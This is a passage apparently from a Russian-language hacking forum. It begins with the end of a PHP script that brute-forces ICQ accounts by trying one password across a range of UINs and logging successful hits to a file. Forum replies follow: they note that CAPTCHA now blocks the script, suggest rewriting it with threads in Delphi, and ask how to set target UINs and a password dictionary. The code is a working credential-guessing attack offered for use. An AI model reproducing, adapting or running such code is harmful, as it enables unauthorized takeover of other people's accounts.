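        if ($chunk === false) {
            break;
        }
        $reply .= $chunk;
    }
    fclose($sock);
    return $reply;
}

// Explicit form input instead of register_globals ($diap1 etc. from anywhere).
$diap1 = isset($_POST['diap1']) ? (int)$_POST['diap1'] : 0;
$diap2 = isset($_POST['diap2']) ? (int)$_POST['diap2'] : 0;
$pass  = isset($_POST['pass'])  ? (string)$_POST['pass'] : '';

if ($diap1 > 0 && $diap2 >= $diap1 && $pass !== '') {
    // The actual brute-force loop: one registration attempt per UIN.
    for ($uin = $diap1; $uin <= $diap2; $uin++) {
        $reply = icq_try($uin, $pass);
        if ($reply === null) {
            echo 'UIN ' . $uin . ": connection failed<br>\n";
            continue;
        }
        // Only a reply that actually arrived and lacks the rejection text counts.
        if (stripos($reply, "We're sorry, your ICQ") === false) {
            $fp = fopen('good.txt', 'a');
            if ($fp) {
                fputs($fp, $uin . ' - pass: ' . $pass . "\r\n");
                fclose($fp);
            }
        }
    }
}
?>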
Этот код не работает, т.к. на форме регистрации ввели картинки (CAPTCHA). Ссылки на Perl и т.п. дать не могу, а вот если на Delphi — почитай про потоки и напишешь без проблем, например вот это: http://gurin.tomsknet.ru/delphithreads.html
Zadoxlik, может, подскажешь, где в скрипте указывать номера ICQ для брута и путь к словарю или пасс? Я так по скрипту глазами пробежался, что-то не нашёл. И интересно, есть ли аналог такого скрипта, только на перле?